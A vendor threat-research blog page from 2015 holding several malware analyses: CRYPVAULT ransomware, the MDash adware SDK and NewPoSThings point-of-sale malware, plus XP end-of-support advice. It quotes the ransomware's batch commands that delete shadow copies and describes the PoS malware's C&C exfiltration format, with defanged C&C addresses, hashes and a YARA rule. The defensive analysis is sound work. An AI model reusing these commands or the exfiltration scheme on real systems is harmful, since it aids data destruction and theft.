Trend Micro Facebook TrendLabs Twitter Malware Blog RSS Feed You Tube - Trend Micro
Search our blog:

  • Recent Posts

  • Calendar

    April 2015
    S M T W T F S
    « Mar    
  • Email Subscription

  • About Us

    Support for Windows XP ended over a year ago. By any standard, Windows XP ranks as one of the most influential versions of Windows ever, thanks to its longevity and widespread adoption by enterprises around the world. However, the end of support should have served as a clear signpost to users and organizations to immediately upgrade to newer systems.

    A year later, remarkably, Windows XP isn’t quite dead yet. Its exact share can be debated. Net Market Share data suggests its share as of March 2015 is at around 17%. StatCounter has this figure at over 11%. Analytics data from US government websites can be used to get an estimate as well; this data places XP market share at just under 5%.

    The risks to Windows XP have not gone away, either. A year’s worth of vulnerabilities that may affect Windows XP have not been patched—only once did Microsoft publicly release a patch for a Windows XP zero-day vulnerability. In addition, various security upgrades for later versions of Windows have not been retrofitted to Windows XP: a good example is Control Flow Guard, which is only available in Windows 8.1 Update 3 (from November 2014) and in Windows 10 (currently in Technical Preview).

    Support for Windows Server 2003 to end in July

    In just under three months, however, IT administrators will have to do the upgrade dance again. Windows Server 2003’s support will end in July this year. A survey of IT professionals by Spiceworks outlined the scale of the issue. 61% of organizations still have at least one instance of Server 2003 running; and only 15% of respondents indicated that their organizations had completed migration. Of those who plan to have some Server 2003 systems active even after the end of support, almost everyone (85%) indicated that security risks were a concern.

    As with Windows XP, we highly recommend that organizations prepare and implement migration plans—if they haven’t already. The potential risks here are even greater, considering servers are the systems at risk.

    Available solutions and recommendations

    Users running unpatched systems are advised to enable Enhanced Mitigation Experience Toolkit (EMET) on their Windows systems. EMET is a free tool by Microsoft designed to protect Windows systems even before new and undiscovered threats.

    Additionally, users who cannot upgrade to newer Windows versions are still protected against threats with our security solutions. Trend Micro Deep Security and Vulnerability Protection are both able to detect threats before they reach user systems. Trend Micro Endpoint Application Control can also lock down systems by preventing unwanted and unknown applications and processes from running.

    Deep Security will support Windows 2000 until 2017 and Windows 2003 and XP until 2020. In addition, our endpoint products will continue to be supported for these older Windows versions until 2016.

    Email this story to a friend   Technorati   NewsVine   MySpace   Google   Live   StumbleUpon  

    Mobile users became alarmed after the discovery of an Android bug that was dubbed as the “Android Installer Hijacking vulnerability.” This flaw can allow cybercriminals to replace or modify legitimate apps with malicious versions that can steal information. Given the high profile nature of this discovery, we decided to search for threats that might exploit this vulnerability.

    A scanner app was released so that users can check if their mobile devices were affected by the Android Installer Hijacking vulnerability. We thought cybercriminals might take advantage of this news and create their own malicious version of the app. However, the malware we did encounter were of a different nature.

    Visiting the Sites

    Using relevant keywords, we came across three websites that advertise “scanners” for the Android vulnerability, with some even using the name of the actual, legitimate scanner.

    First Website

    The first site features two options to download the .APK scanner file. Clicking on any of the two options leads to a site before finally redirecting to the official Google Play page of the scanner app.

    Figure 1. First site “offering” the scanner via two options


    Email this story to a friend   Technorati   NewsVine   MySpace   Google   Live   StumbleUpon  

    We uncovered a new crypto-ransomware variant with new routines that include making encrypted files appear as if they were quarantined files. These files are appended by a *.VAULT  file extension, an antivirus software service that keeps any quarantined files for a certain period of time. Antivirus software typically quarantines files that may potentially cause further damage to an infected system.

    Infection chain

    Arrival Vector

    The malware arrives to affected systems via an email attachment. When users execute the attached malicious JavaScript file, it will download four files from its C&C server:

    • Crypto-ransomware detected as BAT_CRYPVAULT.A
    • SDelete – Microsoft Sysinternals tool (will be renamed to audiodg.exe by the malware)
    • GnuPG – executable open-source encryption tool (will be renamed to svchost.exe by the malware)
    • Library file of GnuPG (will be renamed to iconv.dll by the malware)

    The script will execute the crypto-ransomware after downloading the files mentioned above. The downloaded files are then saved in the %User Temp% folder.

    Figure 1. Email attachment named – Akt_Sverki_za_2014_year_Buhgalterija_SIGNED-ot_17.02_2015g_attachment.AVG.Checked.OK.pdf.js

    I observed that the cybercriminals may have purposely added strings found in known virus scanner logs (such as in AVG, Microsoft, etc.) in order to bypass their scan engines.

    Encryption Routine

    Upon execution, the malware installs an open source encryption tool called GNU Private Guard (GnuPG) into the affected system, which starts the encryption process. This file will generate an RSA-1024 public and private key pair used in the encryption of user files.

    Figure 2. Generated files of GnuPG (private – secring.gpg and public – pubring.gpg)

    It then looks for files to encrypt. The files extensions it targets are as follows:

    • *.xls
    • *.doc
    • *.pdf
    • *.rtf
    • *.psd
    • *.dwg
    • *.cdr
    • *.cd
    • *.mdb
    • *.1cd
    • *.dbf
    • *.sqlite
    • *.jpg
    • *.zip

    Figure 3. The malware searches for files from its list of file extensions and encrypts the file using dropped file by the malware called svchost.exe (a GnuPG executable)

    (Click to enlarge image)

    The malware avoids this list of folders to avoid system malfunction:

    • abbyy
    • adobe
    • amd64
    • application
    • autograph
    • avatar
    • avatars
    • cache
    • clipart
    • com_ intel
    • common
    • csize
    • framework64
    • games
    • guide
    • internet
    • library
    • manual
    • maps
    • msoffice
    • profiles
    • program
    • recycle
    • resource
    • resources
    • roaming
    • sample
    • setupcache
    • support
    • template
    • temporary
    • texture
    • themes
    • thumbnails
    • uploads
    • windows

    After encrypting the user’s files, the malware will then append a *.vault file extension.

    Ransom Notes

    The malware uses the following script to make the affected system display the ransom note when the file is opened:

    Figure 4: Script used by the malware to display the ransom note

    (Click to enlarge image)

    After encryption, the malware will change all associated *.vault file extensions to padlock icons. Each “locked” and encrypted file will display a ransom note when opened, as displayed in the image below.

    Figure 5. Opening any of the files encrypted by BAT_CRYPVAULT.A leads to a ransom note displayed by VaultCrypt. Users will need to upload the Vault key file that the malware drops in the desktop folder to gain access to the site.

    The malware also drops a .TXT file and displays a message on the infected system’s desktop instructing users on how to pay the ransom price in order to decrypt the files. We observed that this particular attack appears to target users in Russian-speaking countries as the attached file name, ransom note, and ransomware support portal are all in Russian.

    Figure 6. The dropped file VAULT.txt written in Russian is found in the Desktop folder. It provides instructions how to decrypt the files.

    Figure 7. Ransom note via an HTML executable file (.HTA file) that is displayed on infected system’s desktop after the encryption of user’s files

    Deleting backup, traces of encryption, and malware components

    The malware deletes key files, secring.gpg, vaultkey.vlt and confclean.lst by using sDelete. a Microsoft Sysinternals tool. sDelete is is capable of overwriting a deleted file’s disk data that makes it difficult or nearly impossible to recover deleted files

    Though this isn’t the first time we’re seeing SDelete being used in crypto-ransomware attacks, it appears that this is a first for malware to use 16 overwrite passes to make sure that recovery tools will have a hard time trying reconstructing the deleted file. This file arrives in the affected system together with the ransomware.

    Figure 8. Key files deleted that were used in the encryption process

    Figure 9. The malware deletes the key files using sDelete

    The malware deletes shadow volume copies if it exists in the system.

    echo Set objShell = CreateObject^(“Shell.Application”^) > “%temp%\win.vbs”

    echo Set objWshShell = WScript.CreateObject^(“WScript.Shell”^) >> “%temp%\win.vbs”

    echo Set objWshProcessEnv = objWshShell.Environment^(“PROCESS”^) >> “%temp%\win.vbs”

    echo objShell.ShellExecute “wmic.exe”, “shadowcopy delete /nointeractive”, “”, “runas”, 0 >> “%temp%\win.vbs”

     Figure 10. The malware deletes its components at the end of its routine

    Downloads info-stealing malware

    The malware also downloads and executes a hacking tool called Browser Password Dump by SecurityXploded from its C&C server. The tool is capable of extracting stored login passwords from the following web browsers:

    • Mozilla Firefox
    • Internet Explorer
    • Google Chrome
    • CoolNovo
    • Opera Browser
    • Safari
    • Flock
    • SeaMonkey
    • SRWare Iron
    • Comodo Dragon

    After execution of the tool, the malware resumes control and drops a visual basic script called up.vbs that will upload the password dump report back to the C&C server.


    We’ve also noticed that despite being a new crypto-ransomware variant, CRYPVAULT appears to possess limited functionalities as it is not coded using programming language; rather was written in a batch script. It also doesn’t import any libraries or create functions, and the components that come with the malware carry out the bulk of its malicious routines. This shows how easy it is for cybercriminals to create new crypto-ransomware variants.

    Ransomware is becoming the next big thing that the threat actors create. Making important user files unusable forces more people to pay the ransom. As more ransomware appear in the wild, it is advised to back up files on a regular basis.

    Related hashes:

    Ransomware Downloader

    • 26f412edd315f4031f5d4e7fcf37f2bb82d6062c


    • 7c76361ae1402246a46fa12b5d7f0d58cff3f8c1
    • 41703605ee631c7aa3a671293062c1d2b88d758b
    • 279759d6037f201f2375e6d120a24c39c4ae96c3
    • 8d1009dc2e89990a67402eb059eb58d83b01983b
    • 0524275053a4be37df60aee6273664893c5b0f2d
    • 0915b41b55a162ad0c376d5c24b9810fcdf30192
    • 0abb675915b3c662f5913a410e70f47cda23c9bc
    • c75ce003e2d994f65c863b3cd3539c178cd86e02


    • 98718c8ff50450e14e16140517a3ae8bc8cabb46

    Update as of April 7, 2015, 11:00 P.M. PST:
    We have edited the first paragraph of the entry to clarify a statement about the quarantined files.

    Credit goes to keydet89 (@keydet89), Ryan Kazanciyan (@ryankaz42), and InfoSec Taylor Swift (@SwiftonSecurity) for initiating a discussion about the description of the files.

    Email this story to a friend   Technorati   NewsVine   MySpace   Google   Live   StumbleUpon  

    Just last month, there were reports that Google removed three apps from its Play Store as they were discovered to be adware in disguise. At the time of the discovery, the apps were said to have been downloaded into millions of devices, based on data from the app stores. However, these were not the only apps with similar behavior. During their investigation in early March, our researchers believe that there were over 2,000 apps with similar behavior on Google Play. However, this number has decreased to the hundreds, if not fewer.

    The Adware MDash

    The adware, detected as ANDROIDOS_ADMDASH.HRX, is an SDK integrated into all of those apps. While it is sometimes called “MobiDash,” we will refer to this adware as “MDash” in this entry. What’s puzzling is that there isn’t any readily available information about this SDK that turned up in our research. It’s highly likely that the SDK was privately published—which is a stark contrast from famous adware vendors who often publish and facilitate the integration of their SDKs to earn as much as they can.

    If the SDK was privately published, then how did it reach the app developers? It’s possible that it was distributed in underground forums.

    A Look at MDash’s Code

    To analyze MDash, we selected an app with the package com.zigzag.tvojdekor. It’s a Russian app that has since been removed from the Lifestyle category on Google Play. Examining the app, we found that the adware SDK MDash was carefully developed and well-maintained.

    Figure 1. Sample app with MDash SDK

    Figure 2. MDash SDK source structure

    When the app is launched, a configuration file disguised in .PNG format is parsed:

    Figure 3. Parsing a local configuration file (highlighted), which is disguised in PNG format

    When we opened the file using a text editor program, we found that there is another remote configuration file, located on a domain registered to a Russian organization in St. Petersburg.

    Figure 4. Opening the disguised configuration file reveals a URL

    Figure 5. Remote configurations on a private host

    The app initiates the adware SDK when two conditions are met: 1) the remote configuration has the keyword Pl3Sdk, and 2) its value is “true.”

    Figure 6. Conditions set for MDash SDK

    Figure 7. Default configurations on the remote private host shows that the conditions are always met

    Presenting Ads After Screen Unlocks

    During installation, this app sets configurations for a so-called “Overapp” ad, possibly installing shortcuts and a home page for the ad. According to the remote configuration details, the Overapp service will start only after 288,000 seconds (over three days) delay. The delay could be so as not to arouse any suspicion once the app is installed.

    Figure 8. Initializing MDash SDK

    Looking into the ad service DisplayCheckService in the code, we see that a broadcast receiver is registered to receive “SCREEN_OFF” events. During “SCREEN_OFF,” the service will request to the remote site to get ads. Once the user unlocks the phone, an ad will pop up.

    Figure 9. Code showing the request to get ads

    The service also sets up alarms to check and start itself every 15 minutes.

    Ads Displayed

    There are several types of ads supported by the SDK. But compared to other ad vendors, there are four distinct ad types in this SDK that deserve focus:

    • Alert – shows the ad in an alert dialogue box
    • Recommendation – presented as a recommendation by someone in the user’s contact list
    • Link – presents a pop-up message, that when clicked, opens the browser to display the ad
    • SDK – loads other popular ad SDKs to show ads

    Figure 10. Sample “link” ad

    Monitoring the ads being displayed, we found that they lead to unwanted apps, scams, and even malware. We found that one “update” was really adware, detected as ADW_ADGAZELLE. It’s worth noting that the malware affects computers, not mobile devices.

    Figure 11. Other sample ads

    Continuous Updates, Improvements

    While examining other apps, we found that the MDash SDK is frequently updated, with new features being continuously developed

    For example, the app “Winter Bunny – Joyfull DressUp” contains a version of the MDash SDK that contains code to make silent calls in the background, without any user consent.  The number it calls is dynamically deployed from the remote server. The SDK contains code to delete the device’s call history to hide the suspicious activity.

    Figure 12. This app can make calls without user consent

    Figure 13. Code snippet of MDash SDK to make background calls

    However, the app doesn’t request the necessary permissions to make the phone calls. This means that potentially fraudulent calls cannot occur.

    We have also seen other versions of the MDash SDK search for and create a list of all the installed apps on an infected device. The information is then sent to a remote server, with the goal of deploying ads promoting similar apps.

    Figure 14. Collecting information about installed apps

    When Ads Turn into Adware

    Analyzing the implementation of the SDK, we found that the routines of the SDK could be enabled or disabled from the remote configuration server. At the time of analysis, these routines were enabled by default in majority of the apps. But re-checking the remaining apps, we found that the backend ad server is currently not deploying ads.

    Figure 15. Ad deployment was disabled

    While this bit of news might seem like a relief for users, they shouldn’t rest easy. Even if the adware behavior is temporarily disabled, there is no guarantee that the developer will not suddenly activate or enable the behavior again. Regardless of the status, users are always at risk since the SDK can be found in their apps.

    Of course, there are other checks that might prevent malicious or suspicious behavior from an app. For example, an app cannot make calls unless it contains the necessary permission (that was given by the user). However, this SDK shows that it can easily change from displaying ads to becoming adware by a simple change in the manifest file.

    Looking at Developers

    We extracted over 1,300 unique certificates signed to these apps. Based on the certification details, about a thousand of them are from Russian developers. Furthermore, about 1,100 certificates appear to have been filled with similar descriptions. The organization “TrueAndroid” seems to be a major contributor to the certificates. However, we cannot vouch for the veracity of the information found in these certificates. Developers can fill out the certificate information with random words as they see fit.

    Of course, we cannot say for certain that these app developers also contributed to the development of the MDash SDK. However, we do know that they were able to acquire and integrate the said SDK to their apps, placing millions of users at risk of adware and other threats.

    These kinds of SDKs are a good reason for developers to check SDKs before integrating them into their apps. Well-meaning app developers might find themselves earning the ire of the public if they unknowingly incorporated SDKs like MDash in their apps.

    We advise users to download apps from known and trusted developers only. App stores do not always assume the responsibility of proactively checking for malicious or suspicious apps, so users should always take the initiative when it comes to protecting their devices. It pays to read reviews of apps to make sure they perform as intended. Reading reviews might help filter out apps that might have been overlooked during security checks. Lastly, users should have a security solution like Trend Micro Mobile Security installed in their mobile devices to detect and block potential threats.

    With additional analysis by Kenny Ye.

    We have notified Google about these affected apps. As of this writing, majority of the apps—including the Russian and “Winter Bunny – Joyfull DressUp” apps—have been removed from Google Play.

    Hashes of the affected apps can be found in this document.

    Email this story to a friend   Technorati   NewsVine   MySpace   Google   Live   StumbleUpon  

    2:11 pm (UTC-7)   |    by

    Arbor Networks initially posted about a new point-of-sale (PoS) malware family named NewPosThings last September, which we detect as either TSPY_POSNEWT.SM or TSPY_POSNEWT.A. We are now seeing new developments in this area—namely, versions for 64-bit and higher.

    The 64-bit version is out

    Similar to the previous 32-bit version reported last year, the 64-bit sample is a multifunction Trojan that includes added functionalities and routines. These include RAM scraper capabilities, keylogging routines, dumping virtual network computing (VNC) passwords, and information gathering.


    When the malware installs itself, it follows a specific algorithm to decide which file name to use.

    1. First, get a base value that is based on the volume serial number and computer name
    2. Using its own function, it calculates the base value to get the final value
    3. Finally, select a file name from the output of step #2 mod 5

    FileName = Array of FileName[Final Value % 5]

    Depending on the output, the file name selected can be:

    • Java\Javaj.exe
    • lsm\lsm.exe
    • svchost\svchost.exe
    • dwm\dwm.exe
    • lsasss\lsasss.exe

    To maintain persistence, it will register itself as a start item “Java Update Manager” when it starts and would restart another process with “RM” parameters.

    Figure 1. The 64-bit NewPoSThings registers itself as Java Update Manager


    This new process will then search for VNC’s password, which includes WinVNC, RealVNC, UltraVNC and TightVNC, and this information is acquired immediately.

    Figure 2. Building the list of stolen VNC password list. It is also seen to disable security warnings for specific extensions (.exe/.bat/.reg/.vbs)

    Figure 3. Disabling security warning for specific file types

     Disabling the Open File Security Warning of Microsoft Windows reduces the overall security posture of the Microsoft Windows host operating system. This is because the system no longer prompts the user for validation when opening up files that could have been downloaded from malicious sources.

    Main malware routines

    After installation, it starts several threads to execute different tasks:

    •  RAM Scraper Thread

    Similar to other RAM scrapers, it enumerates all processes while skipping a whitelist, and searches for a specific pattern. Once it finds a target process, a thread is created to extract credit card numbers from memory. This process, while being simple and straightforward, is not so efficient as there may be a tendency for this RAM scraper to consume all CPU resources if the computer has a lot of running processes.

    Figure 4. Process enumeration routine

    Figure 5. Process White List


    The search pattern is “[0-9]*(=|^).” If a number string is found, it will be validated with “Luhn Algorithm”, and the valid credit card number will be stored in memory and then to the transfer thread.

    • Keylogger Thread

    A hidden window “kl” is created in the background to collect user input. The data will be preserved in memory, and will not be written to a physical file.

     Figure 6. Creation of hidden window “kl”

    • Keep-Alive Thread

    When victim computer is online, this thread will report to its C&C server every 300 seconds, or five minutes.

    • Transfer Thread

    This thread will check every 600 seconds (or 10 minutes) if the data transfer is ready. Once ready, it will send the data to its C&C server.

    Data Exfiltration

    For this POS RAM scraper, the method of data exfiltration is via HTTP, and the context really depends on the data being collected.

    C&C Server:
    Protocol: HTTP
    User-Agent Mozilla/4.0(compatible; MSIE 7.0b; Windows NT 6.0)
    Method POST, example: cs= aW5zZXJ0&p=Windows+7+64+TEST&m=53852938&v=1.0

    The parameters being sent can be of the following –

    Parameter: cs

    Value Type Remark
    cGFzcw Send Stolen VNC Password TightVNC/WinVNC/UltraWNC/RealVNC
    aW5zZXJ0 Report Client Information OS + Computer Name + Client Version
    bG9n Keep Alive Ping!
    a2xvZw Send Log Data Key logger + Credit Card Number
    •  Parameters: p

    (OS Version)+(Platform) +(Computer Name)

    Parameters: m

    Session ID

    Parameters: v

    Client Version is a fixed value => 1.0, in this case

    • Parameters: ls

    Stolen Data

    The 64-bit file we examined has been able to send back version 1.0. In comparison, earlier 32-bit samples (detected as TSPY_POSNEWT.SM or TSPY_POSNEWT.A) did not send back the client file’s version, and the URL format of the C&C was different:

    64-bit v1.0 C&C Earlier 32-bit C&C
    http://80[dot]82[dot]65[dot]112/connect/2 http://wordpress-catalogs[dot]com/dkok/ek[dot]php http://91[dot]121[dot]87[dot]188/cms/CMS/ek[dot]php http://62[dot]68[dot]96[dot]173/cdsfh/ek[dot]php

    The 64-bit C&C would also be the same URL format that we would see in higher versions, as we would detail below.

    Growing versions

    The change in the format of the CNCs was not the only observable change as NewPoSThings showed new versions over a couple of few months. Each version had a minor tweak, with the most current version (version 3.0) being the most complex:

    Version Changes
    1.0 Disables Security Warning: Add “.exe/.bat/.vbs/.reg” to LowRiskOnly in 32-bit version:PDB: C:\Users\Tom\documents\visual studio 2012\Projects\jsd_12.2\Release\jsd_12.2.pdbOnly in 64-bit version:
    Sent back the client version:PDB: C:\Users\Tom\documents\visual studio 2012\Projects\jsd_12.2\x64\Release\jsd_12.2.pdbCompiled within the last 2 weeks of November 2014
    2.1 – 2.3 Disables Security Warning: Modifying “:Zone.Identifier”PDB: C:\Users\Tom\documents\visual studio 2012\Projects\jsd_12.2\Release\jsd_12.2.pdbSamples seen may have been compiled during December 2014Later versions, possibly generated on January 2015 already had application manifest / compatibility stated for Windows 7, and also used a custom packer.
    3.0 Disables Security Warning: Modifying “:Zone.Identifier”PDB path now totally hidden.Application manifest / compatibility stated for Windows 7

    Uses a custom packer, added some anti-debugging methods

    Samples seen may have been compiled during the last week of January 2015

    Currently, we’ve seen repackaging of version NewPoSThings 2.x with additional malware – SHA1: ffd268bf769e0ac0ba0003ae98fb09ab12883da4, currently detected as BKDR_BEZIGATE.AI. This malware is a backdoor type which presents some interesting features:

    • First of all, it has a keylogging functionality as well as starting/stopping VNC and web camera:

    Figure 7. Features of BKDR_BEZIGATE.AI

    • Secondly, it sends feedback to its C&C server on the running processes

    The more common approach for PoS malware is to bundle it with potentially unwanted applications (PUA), also known as adware. Packaging this PoS RAM scraper provides additional control over the affected endpoint.

    Affected Parties

    While going through C&C activity we saw, there were two that stood out. We observed attempts to connect to the C&C of the newer NewPoSThings PoS malware from IP addresses of two US-based airports. Together with the recent news on the Los Angeles International Airport (LAX) credit card breach, we believe that our previous write-up about seeing PoS attacks targeting travelers may not be far from the truth. No matter which country, airports represent one of the busiest establishments where there are transactions being made all year round.

    This further reinforces the fact that PoS malware, and the threat actors behind it, may have definitely matured to branch out to targets other than large retailers or small merchants. Late 2014 we came out with a blog post that talks about these targets: Planes, Trains & Automobiles – Are You Safe From PoS Malware Anywhere?

    Recommendations and Solutions

    While Trend Micro already detects this threat, and blocks all C&Cs listed below, the following recommendations may help in this situation:

    • Assess if it is possible to segregate PoS terminals from the rest of the network, and employ correct access controls. This would help getting the PoS terminals installed with malware by going through the network, or even making it harder for the malware to exfiltrate the stolen data. In this case, the data scraped from the PoS terminals would not be uploaded to the C&C servers if there was no direct access to the internet to begin with.
    • If possible, employ application whitelisting technology to control which applications run in your network. This would best be done before deploying the PoS terminals, when we know that they are risk free.
    • Check if there is any ways or means to detect an infection, like firewall or proxy logs. The use of YARA can also be an option, if PoS terminals are installed with a different antivirus solution. The indicators are provided below to help incident responders and security specialists.

    Using a multi-layered security solution within the enterprise will enable your organization control user data while giving enterprise-wide visibility. This complete approach can help prevent PoS-related data breaches and business disruption from gateway and mobile devices. In addition, you can centrally manage threat and data policies across multiple layers of your IT infrastructure, streamline management, and provide more consistent policy enforcement. For endpoint monitoring and validation for possibly active infections, Trend Micro Deep Discovery Endpoint Sensor can use the IP address and port, as well as the YARA rule, listed below.


    The indicators below are compiled examples based on the observed threat.

    SHA1 Compile Time Size (in bytes) Trend Micro Detection Notes
    168,960 TSPY64_POSNEWT.A 64-bit, v1.0
    174,080 TSPY64_POSNEWT.A 64-bit, v2.2
    184,320 TSPY_POSNEWT.SMA 32-bit, v2.1
    153,600 TSPY_POSNEWT.SMA 32-bit, v2.1
    153,600 TSPY_POSNEWT.SMA 32-bit, v2.1
    184,320 TSPY_POSNEWT.SMA 32-bit, v2.1
    153,600 TSPY_POSNEWT.SMA 32-bit, v2.2
    154,112 TSPY_POSNEWT.SMA 32-bit, v2.3
    432,128 TSPY_POSNEWT.SMB 32-bit, v2.3
    432,128 TSPY_POSNEWT.SMB 32-bit, v2.3
    415,232 TSPY_POSNEWT.SMB 32-bit, v3.0
    414,720 TSPY_POSNEWT.SMB 32-bit, v3.0

    Here is a list of C&C locations observed:

    • http://80[dot]82[dot]65[dot]112/connect/2
    • http://80[dot]82[dot]65[dot]112/connect/5
    • http://80[dot]82[dot]65[dot]112/connect/9
    • http://192[dot]10[dot]10[dot]1/connect/2
    • http://5[dot]39[dot]88[dot]204/connect/2
    • http://80[dot]82[dot]65[dot]23/connect/3
    • http://80[dot]82[dot]65[dot]23/connect/9

    Here is the Yara rule:

    rule PoS_Malware_NewPOSThings2015 : newposthings2015
    author = “Trend Micro, Inc.”
    date = “2015-03-10″
    description = “Used to detect NewPoSThings RAM scraper, including 2015 sample set”
    $pdb1 = “C:\\Users\\Tom\\documents\\visual studio 2012\\Projects\\NewPosThings\\Release\\NewPosThings.pdb” nocase
    $pdb2 = “C:\\Final32\\Release\\Final.pdb” nocase
    $pdb3 = “C:\\Users\\Tom\\documents\\visual studio 2012\\Projects\\jsd_12.2\\Release\\jsd_12.2.pdb” nocase
    $pdb4 = “C:\\Users\\Tom\\documents\\visual studio 2012\\Projects\\jsd_12.2\\x64\\Release\\jsd_12.2.pdb” nocase
    $string0 = “Software\\Microsoft\\Windows\\CurrentVersion\\Run” wide
    $string1 = “Mozilla/4.0(compatible; MSIE 7.0b; Windows NT 6.0)” wide
    $string2 = “Content-Type: application/x-www-form-urlencoded” wide
    $string3 = “Use 64bit version.” wide
    $string4 = “SeDebugPrivilege” wide
    $string5 = “Java Update Manager” wide
    $string6 = “Java\\Javaj.exe” wide
    $string7 = “lsass.exe” wide
    $string8 = “aW5zZXJ0″
    (any of ($pdb*)) or (all of ($str*))

    With additional insights and analysis from Kenney Lu and Numaan Huq

    Email this story to a friend   Technorati   NewsVine   MySpace   Google   Live   StumbleUpon  


    © Copyright 2013 Trend Micro Inc. All rights reserved. Legal Notice